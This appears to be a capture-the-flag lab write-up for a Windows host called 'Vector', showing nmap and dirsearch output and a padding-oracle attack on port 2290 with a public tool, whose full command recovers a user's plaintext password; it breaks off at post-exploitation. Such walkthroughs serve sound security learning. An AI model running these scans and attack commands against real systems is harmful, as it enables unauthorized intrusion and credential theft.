Initial Nmap Scan

sudo nmap -sS -sCV -p- -Pn -v -oN Nmap/Initial-Vector Vector

Output

# Nmap 7.94SVN scan initiated Fri Jun 21 04:39:14 2024 as: nmap -sS -sCV -p- -Pn -v -oN Nmap/Initial-Vector Vector
Nmap scan report for Vector (192.168.222.119)
Host is up (0.26s latency).
Not shown: 65527 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds  Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
2290/tcp open  http          Microsoft IIS httpd 10.0
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-21T08:50:25+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=vector
| Issuer: commonName=vector
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-03-22T16:36:29
| Not valid after:  2024-09-21T16:36:29
| MD5:   3a68:bca7:93da:d9d9:0748:1a1d:b6a1:9e0c
|_SHA-1: 5ae7:a6d8:afd7:50a4:e1bf:d7b6:21c7:23b9:7aac:a79a
| rdp-ntlm-info: 
|   Target_Name: VECTOR
|   NetBIOS_Domain_Name: VECTOR
|   NetBIOS_Computer_Name: VECTOR
|   DNS_Domain_Name: vector
|   DNS_Computer_Name: vector
|   Product_Version: 10.0.17763
|_  System_Time: 2024-06-21T08:49:44+00:00
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2024-06-21T08:49:43
|_  start_date: N/A
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
# Nmap done at Fri Jun 21 04:50:27 2024 -- 1 IP address (1 host up) scanned in 672.99 seconds

Enum Using Dirsearch

sudo dirsearch -u <IP:port> -w /path/to/wordlist

Output

# Dirsearch started Fri Jun 21 04:49:16 2024 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u <http://Vector> -w /usr/share/wordlists/seclists/Discovery/Web-Content/big.txt

404     2KB  <http://Vector/aux>
404     2KB  <http://Vector/com1>
404     2KB  <http://Vector/com2>
404     2KB  <http://Vector/com3>
404     2KB  <http://Vector/com4>
404     2KB  <http://Vector/con>
404     2KB  <http://Vector/lpt2>
404     2KB  <http://Vector/lpt1>
404     2KB  <http://Vector/nul>
404     2KB  <http://Vector/prn>
                                  

Output port 2290

Untitled

Untitled

Untitled


Exploitation

Using this exploit

<https://github.com/mpgn/Padding-oracle-attack>

An exploit for the Padding Oracle Attack. Tested against ASP.NET, works like a charm. The CBC mode must use PKCS7 for the padding block. This is an implementation of this great article Padding Oracle Attack. Since the article is not very well written and may be unclear, I made an explanation in the readme. I advise you to read it if you want to understand the basics of the attack. This exploit allows block sizes of 8 or 16. This means it can be used if the cipher uses AES or DES. You can find instructions to launch the attack here.

Untitled

so here’s a breakdown of the tool’s params:

  1. -c cipher , which means in our case this one “4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488”
  2. -l <length>, in our case its 16
  3. —host <IP> , in our case its Vector:2290
  4. -u <url> , in our case its /?c=
  5. -v <verbose output>
  6. —error <ERROR> , in our case its '<span id="MyLabel">0</span>’

so the full format for this exploit to work is this

sudo python exploit.py -c 4358b2f77165b5130e323f067ab6c8a92312420765204ce350b1fbb826c59488 -l 16 --host Vector:2290 -u /?c= -v --error '<span id="MyLabel">0</span>'

Untitled

Working !

Untitled

Plain text password of the user Victor


Post-Exploitation

After gaining the password,